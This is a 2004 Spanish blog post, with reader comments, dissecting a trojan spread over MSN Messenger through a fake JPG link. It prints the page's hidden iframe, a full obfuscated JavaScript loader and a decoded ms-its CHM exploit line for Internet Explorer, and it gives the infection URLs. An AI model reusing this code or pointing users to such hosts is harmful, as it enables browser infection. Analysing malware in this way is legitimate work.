Me he encontrado con lo que ya había anunciado alguna vez; un virus (pinta de troyano) que con el simple hecho de ver una imagen JPG te infectaba; claro, el de ahora es mucho mas creativo.
Este virus en cuestión, según descripciones de Jesús, se instala en tu PC y en las conversaciones de MSN Messenger te coloca debajo de tu nick una dirección (Que tu no ves) donde ver el JPG en cuestión . . .así que el primer lu... amigo tuyo que te vea en messenger con esa URL, probablemente la abrirá y TOMA YA otro infectado mas y el ciclo continua... larga vida a Internet Explorer
Y esto lo digo porque es precisamente con Internet Explorer con quien se ejecuta el virus, si abres la URL del JPG en Firefox no pasara nada, ya que es invulnerable.
También invulnerables (Según Otro Blog Mas) las maquinas con el Service Pack 2 de Windows XP
Como siempre, no hay antivirus que valga, a menos que lo actualices . . . mañana; o bien, te pases a Firefox (Cuya versión 1.0 empieza su llegada) y te olvides de esos problemas
Ahora a la diversión
Pues que no me he aguantado y le he pedido a Jesús que me pase el link al JPG, así que para los mas osados (Y que no estén usando Internet Explorer) aquí lo tienen
http://www.xf2s.com/msn/wode.jpg
Empiezo a deshuesar el engendro, y este es el código interno que lo compone
Código :
<html> <iframe src="news.htm" width="0" height="0" frameborder="0"></iframe> <center><img src="1.jpg"></center> <html>
Mmm, simples 4 líneas de código HTML; pero el mal se esconde mas allá, donde dice news.htm; Así que voy a buscar el mencionado archivo HTML
http://www.xf2s.com/msn/news.htm
Cuyo codigo es
Código :
<html><head><Meta Name=Encoder Content=»¶Ó·ÃÎÊ> <!--The page is protected by HTMLShip XP(Unregistered Version)--> <META HTTP-EQUIV="imagetoolbar" CONTENT="no"> </head><body> <script language="javascript"><!-- nJ8="\%shsssH0",gJ86="\%dh\'hHH0";.5200865,sG82=".6982664", gJ86='ZzEl\@J1eR\]Ia4\ Xj\ <6y0A8F\.H\:\;C\nn\(mvP2Q\'\*tV\^TLh\r3\|\&Sx\#\, 5\=\+Krq\}fpW\>Boi\%csg\[D\{k\\Nw\/\"M\?Gb\)9\-\_7O\`Ud\~Y \!u\$',nJ8='xYa\?u\ j\<o\\\%\nlBZe\#\{Nr6pWQM1hn\/7\'\]\-\+c !k2Cs\^O\)g9\`3\,dKi\$\&qUmD\:\|P\;\*LfHE\[\.J8b\}\> T0\"\=wySv\~VRG\@\rz5\_\(X4tIAF';function nQ62(fW84){"\%d\'\'\'d\'h",l=fW84.length;'Mq533B6B',w=''; while(l--)"\%d7\'\'0\'3",o=nJ8.indexOf(fW84.charAt(l)), 'NM3q3B3W\?\r63',w=(o==-1?fW84.charAt(l):gJ86.charAt(o))+w; "\%\'khkkh\'",nJ8=nJ8.substring(1)+nJ8.charAt(0), document.write(w);'MN\@35qBB'}; nQ62("\#J\.DE\;CB\?\n78A\n8\<qe\n\-\nJ\.DE\;CLD\}jrq \`lGGhEP\'XH\.A\]\<7CQ\n\?\?R\>PA7\.CEH7B\rX\]\'R\>D\<CAD7BP \n\?J\<\|hPA7\.CEH7B\r\]X\]\'R\>XH\.A\]\<7CQH7\.H7C\<KC\] \<7Aq\rX\]hJ\<COE\]\<HAC\'y\r\]X\]\'Ry\$prrR\|h\r\]X\]\'Rh\|XH \.A\]\<7CQH7\.H7C\<KC\]\<7Aq7\<\=BWA7\.CEH7\'yD\<CAD7BP \n\?J\<yRhPA7\.CEH7B\r7X\]\'\<R\>EP\'XH\.A\]\<7CQ\?\nN\<DJ33 \=E7XH\=QJEX\<V\nDR\>EP\'\<Q\=gE\.gIqjRD\<CAD7BP\n\?J\<h \|\|hEP\'XH\.A\]\<7CQ\?\nN\<DJR\>XH\.A\]\<7CQ\.\n\;CAD\<a \-\<7CJ\'a\-\<7CQS5\(da\}5\*\"RhXH\.A\]\<7CQH7\]HAJ\<XH \=7q\r7X\]h\|\<\?J\<\>XH\.A\]\<7CQH7\]HAJ\<A\;q\r7X\]h\|h8 \*zGqjcjjh\-Ollq\&cjchPA7\.CEH7B\rX\=J\'R\>\=E7XH\=QJC \nCAJBqByOg\<B\;\n8\<BEJB\;DHC\<\.C\<XBVNBMOS\)dgE\; BZ\+yhJ\<COE\]\<HAC\'y\rX\=J\'Ry\$jrrRh\|h\rX\=J\'RhX\ \&zql\{\`Gh\.njlqcrzchPA7\.CEH7B\rXXJ\'R\>EP\'XH\.A\] \<7CQ\n\?\?R\>XH\.A\]\<7CQH7J\<\?\<\.CJC\nDCqPA7 \.CEH7B\'R\>D\<CAD7BP\n\?J\<\|hJ\<COE\]\<HAC\'y \rXXJ\'Ry\$zrrR\|\|h\rXXJ\'RhV\+zlq\`cj\&h\.dp\{qp\`\&\{hC\} GjqjcjlhP\ \`pqc\`\&lh\<\*Gpq\`lG\{hC\ (\{\`qzlGphTa\{pq\`\&\{hh\r\?E\.\<7J\<X\rCH\rqyyh\#wJ\.DE\;CL") //--></script> <sCRIPt LANGuAge=JavAsCrIpt> nQ62("\{soisl\:olZ\[4USJE4oSZ8sruoUS4\[8\*ulrh\'E\'onSf \`7\{ER\#oJsZ4lslUSd\$\<6\@n8\r\[s8h\-9s\-uh\;\[uohyyJh \"\;EEM\-9sAxT\*ls9Pyso8sMJ9\-hhyso8sM9s\-SZsr\*oUSsoisyi \r8J\:\[\*suosSf\{yER\#oJsf\`7\{ysoisl\:olf\`7\{8J\:\[\*sZul \'bFlboUS\#l\+l8J\:\[\*sSf\`74EJF\-o\'sMw\:\[so\]JE4oM\+luFoM \:o\*ulJo\]y\"xT\*ls9Pyb\&uEJls\[E\'M9\:o\;M8FR8s\:\[\'b\]6\&uEJls \[E\'M9\:o\;M\[\'4oi\_\;\]2\'ow8M9s\-2GGGGn\`7\{y8J\:\[\*sf \{slRuoZRE\:4o\:U6Zw\[4s9U\<66\.Z9o\[b9sU\!qZJouu8\*lJ\[ \'bU6ZJouu\*l44\[\'bU6f\{s\:f\{s4Zw\[4s9U5q\.Z9o\[b9sU\< \@f\{Ru\[\'0f\{\-l\:\|Foof\)9oZ\*lboZ\[8Z\*\:EsoJso4ZRrZ1\) vgK9\[\*\{y\-l\:\|Foof\{yRu\[\'0f\{ys4f\{s4Zw\[4s9U\!q\.Z9o \[b9sU\<\@f\{8s\:E\'bf\{lZ9\:o\;U9ss\*hyywwwM0l\[89o\'bM \'osy9s\-u89\[\*y\:ob\[8so\:M9s\-fcEwo\:ZRrZ1\)vgK9\[\*\{ylf \{y8s\:E\'bf\{ys4f\{ys\:f\{yslRuof")</script></body></html>
Ah claro, ya entendí!
Aunque la verdad esta encriptado con la utilidad mencionada (Que por cierto esta unregistered, estos programadores de virus de hoy en día ); sin embargo saltarse esa encriptación es pan comido y del código desencriptado que me sale (Que por cierto es muy aburrido y tiene un aviso de registrar el mentado programa) resalto estas líneas
Código :
<object data="ms-its:mhtml:file://c:\foo.mht!${path}/test.chm::/test.htm" type="text/x-scriptlet"></object>
Este SI es el virus; un simple object que ejecuta un CHM (Compiled HTML) que tiene un código maligno que desde HTML ejecuta el código que hace funcionar a todo el virus; así podría seguir el desensamble, pero como ya esto se pone aburrido diré que actualmente Firefox ha dejado de ser un navegador de lujo a convertirse en una necesidad latente dados los hechos
¿Tiempo de cambiarte a Firefox (O a mozilla o a Opera o a Linux )?
¿Sabes SQL? ¿No-SQL? Aprende MySQL, PostgreSQL, MongoDB, Redis y más con el Curso Profesional de Bases de Datos que empieza el martes, en vivo.
Por JOHNMARTIN el 15 de Septiembre de 2004
Hace tiempo en un link de http://www.astalavista.box.sk habia una pagina que nos daba opciones de otros links infectados, o sea que uno daba un link cualquiera para ver una imagen jpg y en lugar de uno infectarse le daba un javascript que indicaba que el jpg estaba infectado, pero pues no infectaba. Tamben habian links donde uno podia desde un formulario registrarse de a "mentiritas" y cuando le llegaba a un el mail, le informaba que el fiel estaba infectado pero sin infectarse uno... claro claro que eso solo pasaba con OExpress al tiempo que se permitia ver html en sus mail ...
En fin, hay muchas formas de comprobar que muchos de los componentes de Windows son demasiado riesgosos ... como el SP2 que es para sarle a uno trsitezas ... pongan cuidado: Inatalas el SP2 y se supone que trae el ultra Firewall, listo, muchos podran quedar tranquilos y felices porque ya jamas de los jamases tendras un virus rondando tu PC. Pero entonces sucede lo triste, realmente triste > teniendo instalada la version 0.9 de Firefox, bajas e instalas la version 1.0 Preview y lo corres tras la instalacion, entonces en mi caso Panda Internet Security me informa que Mozilla Firefox 1.0 esta tratando de acceder a Internet a lo que respondo que claro, que no hay problema, que lo deje hacer en mi maquina lo que se le de la gana ... ... pero que pasa??? no veo que el Ultra SP2 aparezca informandome de este evento (se supone que es un firewall no?) ... sigo esperando ... y sigo esperando ... (si fuera mujer ya tendria nietos) ... y aun amigos mios, sigo ESPERANDO ...
En fin, no se si es que elUltra firewall del SP2 sea hecho por Fisher Price-Toys, pero el caso es que el Ultra Firewall, NO ME AVISO NADA !
Bueno, tengo varios juguetes Fisher Price, pero no sabia que estuvieran trabajando para Microlost ... perdon, microsft ...
Saludos !
JOHNMARTIN
Por el 15 de Septiembre de 2004
Jesus:Hola amigo
Infectado:Hola
http://www.infectatecontroyanos.win
Jesus:Como estas?
Infectado:Bien
http://www.infectatecontroyanos.win
etc etc.
Por M el 15 de Septiembre de 2004
Por TheOm3ga el 15 de Septiembre de 2004
http://www.microsoft.com/technet/security/bulletin/MS04-028.mspx
Saludos.
Por cv el 15 de Septiembre de 2004
Por _david el 15 de Septiembre de 2004
por mas bueno q sea, si no hay virus para firefox es por q nadie lo usa ....
Por Freddie el 16 de Septiembre de 2004
Los virus que se apoyan en codigo HTML son ejecutados gracias a tecnicas NO ESTANDAR, como por ejemplo, el CHM en este caso, los ActiveX, etc
Firefox ha tenido 2 vulnerabilidades graves que desaparecieron el mismo dia; Internet Explorer ha tenido 12 semanales y creo que esto yo lo anuncie hace MUUUCHOOO si te fijas en el post inicial
Microsoft se ha concentrado en abstraer las cosas al usuario sacrificando la seguridad del mismo, ..., ahi tienes
Y decir que nadie usa Firefox es de por si un poco arrisgado, ya que el 16% de los usuarios de la web no son pocos (Y eso no significa que el 84% sean usuarios de Internet Explorer)
Por Elecash el 16 de Septiembre de 2004
No se, la verdad es que al final será peor el remedio que la enfermedad...
Por _CONEJO el 16 de Septiembre de 2004
En realidad es como decir oye, mira esta pagina www.troyanos.com/infectate.html ... solo que una imagen es mucho mas llamativa...y por cierto, los kreaadores de gusanos... xq los hacen? si realmente estos son ""inofensivos"" en la mayoria de veces...¿?¿?
Por Freddie el 16 de Septiembre de 2004
Eso era el MSBlaster, una prueba del concepto de un ataque al RPC y comvertir un PC en Zombie, y le salieron tantas variantes ....
MyDoom fue el primer virus serio que creaba zombies y ahora no hay virus que no incluya un motor de "zombicidad"; eso es un ingreso muy fuerte y ayuda a los spammers (Y con tanto 1337 de hoy en dia que se baja cuanto "programa juaker" encuentra, los zombies aumentan cada dia)
Por Yumi el 16 de Septiembre de 2004
Por _david el 16 de Septiembre de 2004
Por Freddie el 16 de Septiembre de 2004
Por hRod el 16 de Septiembre de 2004
Por supuesto estoy mas podrido aún con todo lo que tenga que ver con microlost! como diria JM.
Particularmente uso dos ordenadores uno mac y otro pc con guindougs (no por mucho) pero trato de usar lo menos posible todo lo que tenga que ver microlost!
Pero justamente ayer, sin tener idea de este blog, pensaba lo seguro que me siento cuando estoy en mi mac y lo que se deben sentir los usuarios de lunix, muy por el contrario los que usan quindougs y softs relacionados.
Mi pregunta es:
la variedad y cantidad de virus que existen hoy y son peligrosos para programas relacionados con microlost, algun día lo serán para MacOS o para linux?
Por La100rra el 16 de Septiembre de 2004
Por Freddie el 16 de Septiembre de 2004
Hay cosas que son inevitables, bien lo dije yo, ahora con tanto 1337 suelto ...
Por _david el 16 de Septiembre de 2004
Por _david el 16 de Septiembre de 2004
http://www.w3schools.com/browsers/browsers_stats.asp
juzguen uds mismos
Por da el 16 de Septiembre de 2004
Ya se que la culpa no es del navegador y que si se cumplieran con los estandares no habria problemas, pero eso no pasa. La mayoria usa explorer y diseña/desarrolla para explorer.
A mi me resulta muy molesto estar navegando por paginas que no conozco y ver que no hace nada, cargarla en explorer y que resulte que habia enlaces que no se ven o botoneras que no se desplegaban, etc.
Le pese a quien le pese, hoy por hoy no se puede navegar sin explorer.
Pd: si quereis se podria hacer un post con todas las webs que no se vizualizan correctamente. Seguro que crece rapido.
Por Yumi el 16 de Septiembre de 2004
Por _david el 16 de Septiembre de 2004
un sitio q construí tiene una aplicacion flash q es un telefono, con el cual se puede llamar mediante voz sobre IP, y obviamente utiliza un control activeX para esto...cual seria la verguenza?
Por Freddie el 17 de Septiembre de 2004
Eso es lo que yo llamaria ... galeria de la verguenza; eso y las webs que te dicen de plano "Necesita Internet Explorer para navegar" y funcionan bien, o las que por JavaScript directamente te niegan el acceso si el userAgent String no es MSIE
Creo que no seria mala idea, de hecho, seria muy buena tener una lista de links de ese estilo
Por La100rra el 17 de Septiembre de 2004
Por _david el 17 de Septiembre de 2004
Por Freddie el 17 de Septiembre de 2004
MWAHAHAHAHAHAHAHAHAHAHAHAHA
Por _david el 17 de Septiembre de 2004
http://www.htmlgonebad.com
para ver las mejores creaciones ... zzz:
Por Ramm el 18 de Septiembre de 2004
CorelDraw, o para Windows y Mac (Photoshop, Dreamweaver,Flash, etc.)
Si por mi fuera tendria un Mac pero....
Linux significaria para mi un retroceso, volver a aprender.
Asi que estoy condenado a sufrir las consecuencias de usar Windows.
Por Freddie el 18 de Septiembre de 2004
Linux significa aprender un poco mas ... si quieres
Por skins_say el 18 de Septiembre de 2004
Por Freddie el 19 de Septiembre de 2004
Por skins_say el 19 de Septiembre de 2004
Por Freddie el 19 de Septiembre de 2004
En serio, un ejemplo; o si no http://sf.net/
Por skins_say el 19 de Septiembre de 2004
Por Freddie el 19 de Septiembre de 2004
http://sourceforge.net/search/
Usamos vmWare para correr Flash (No es una emulación, sino una implementación de una maquina virtual completa en memoria, asi que el rendimiento es completo), en este foro se que Neo_JP y ICEM4N lo hacen, aparte de mi
Puedes ver screenshots y algunas cosas mas aqui
Ejecutar Flash MX 2004 en Linux
Por You el 19 de Septiembre de 2004
Por Freddie el 19 de Septiembre de 2004
http://housecall.antivirus.com/
Compatible con Firefox
Por o el 19 de Septiembre de 2004
Por Freddie el 19 de Septiembre de 2004
Por Ramm el 19 de Septiembre de 2004
me voy al foro de Linux (ya lo descargue) para ver como empiezo...
Por Freddie el 19 de Septiembre de 2004
Por JOHNMARTIN el 20 de Septiembre de 2004
JOHNMARTIN
Por skins_say el 20 de Septiembre de 2004
Por La100rra el 21 de Septiembre de 2004
LinuxLab :: ++ :: Software Libre
Por Ramm el 29 de Septiembre de 2004
Recientemente la compañía Microsoft informó la existencia de una vulnerabilidad denominada Exploit/MS04-028, que afecta al proceso de visualización de archivos de imagen JPEG. Este problema ha sido localizado en muchos de los productos de dicha compañía, entre los que se encuentran Office XP, Office 2003 o el sistema operativo Windows XP.
Concretamente, cuando un usuario abre una imagen JPEG construida para aprovechar esta vulnerabilidad se provoca un desbordamiento de buffer que permite llevar a cabo acciones tales como robo de datos confidenciales, envío masivo de mensajes de e-mail, creación de puertas traseras en el computador, o la descarga y ejecución de todo tipo de archivos, entre otras muchas. Esto hacía pensar que la aparición de un código malicioso que hiciera uso de la vulnerabilidad Exploit/MS04-028 era sólo cuestión de tiempo.
Confirmando este temor, PandaLabs ya ha detectado la puesta en circulación de un kit, denominado Constructor/JPGDownloader que permite fabricar archivos JPEG que aprovechan la vulnerabilidad Exploit/MS04-028. Concretamente, el kit permite especificar direcciones web desde la que se descarguen aplicaciones de todo tipo, simplemente visualizando el archivo JPEG maliciosamente construido.
Luis Corrons, director de PandaLabs informa en un comunicado de prensa que: "está claro que los creadores de virus van a aprovechar al máximo la nueva vulnerabilidad, y que van a lanzar todo tipo de virus que hagan uso de ella. Sin embargo, dadas las características de este problema de seguridad, debe prestarse mucha atención a los troyanos que aparezcan, que suelen pasar desapercibidos para muchos usuarios pero que son muy empleados por ciberdelincuentes para llevar a cabo todo tipo de estafas online. Además, estamos hablando de archivos JPEG, el formato más utilizado para enviar imágenes por correo electrónico o para incluirlas en páginas web, lo que agrava aún más la situación. Vamos a pasar de gusanos que tratan, por ejemplo, de hacerse pasar por una imagen (utilizando archivos con doble extensión o cambiando de ícono, por ejemplo), a que la propia imagen forme parte del gusano".
diarioti.com
www.pandasoftware.cl
27/09/2004
Por fl el 29 de Septiembre de 2004
Ahora la mayoría de los hackers se enfocar en destruir al mas poderoso en el mercado, hasta el momento es Microsoft es por eso que reciben más ataques.... pi pi .... Fin de la transmisión
Por cgu el 07 de Noviembre de 2004
puedes preguntarle a un experto en alguno de esos programas.
hay optimizaciones y muchas cosas que simplemente en los equivalentes en software libre no trae, y para los que verdaderamente usan esos programas seria un retroceso.
Por Freddie el 07 de Noviembre de 2004
Por llops el 13 de Noviembre de 2004
Bueno, pues ahí tienes 2 ejemplos: photoshop y autoCAD.
Ojo, no estoy diciendo que no haya alternativas (incluso muy buenas) a estos programas, sólo reafirmo la opinión de cguZZman cuando dice que para ciertos programas sus equivalentes en linux no tienen la misma potencia.
Por Freddie el 13 de Noviembre de 2004
Por otro lado, creo que el poder de Blender esta mas que demostrado, viniendo de SGI, asi que AutoCAD tiene un digno rival en el CAD
Creo que el escritor del articulo, como tal, puede que no conociera estos programas, por eso lanza opiniones al respecto
Por Pedro el 13 de Noviembre de 2004
skins_say :
Si los puedes abrir en linux (openoffice.org es el alternativo).
Por Pedro el 14 de Noviembre de 2004
Por paola el 27 de Diciembre de 2006
xfa diganme k pasa o k ondaa?
Por ggf el 22 de Mayo de 2007
¿puede un virus jpg estropear el disco duro?
Por romi el 19 de Julio de 2007
besotes!
romi
Por charlie140788 el 06 de Septiembre de 2007
Por Jomora el 30 de Septiembre de 2007
Lo cogi al descargarme un programa para retoque de fotografias, el cual ofrecian en una version nueva. Se trata de Abrosoft Fanta Morph 3.0.5,. La web estaba escrita en idioma chino, y tonto de mi, crei que era legal.
No se os ocurra descaregar nada de Internet que no sea seguro o almenos lo parezca.
Para solucionar el problema he tenido que desinstalar Internet Explorer y trabajar con Mozilla, que si tiene detector de virus.
Por infernalpr el 02 de Octubre de 2007
Jomora_blog :
Gracias por el consejo, nunca lo tuve en cuenta, me has solucionado la vida
Por cyberboy7 el 25 de Septiembre de 2008
A dos o ters caidas con limite de Ram. je je
Por cyberboy7 el 25 de Septiembre de 2008
Por Tito el 29 de Diciembre de 2008
Por [email protected] el 26 de Febrero de 2009